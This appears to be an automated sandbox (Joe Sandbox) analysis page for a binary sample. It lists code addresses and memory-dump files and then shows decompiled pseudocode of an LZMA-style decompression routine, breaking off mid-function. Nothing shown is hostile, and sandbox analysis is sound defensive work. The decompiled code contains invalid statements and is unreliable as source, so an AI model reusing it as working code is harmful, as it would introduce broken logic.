                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00407094
                                                        0x0040704f
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00407094
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e52
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x004070be
                                                        0x00407087

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                        • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                        • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                        • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406F8C() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
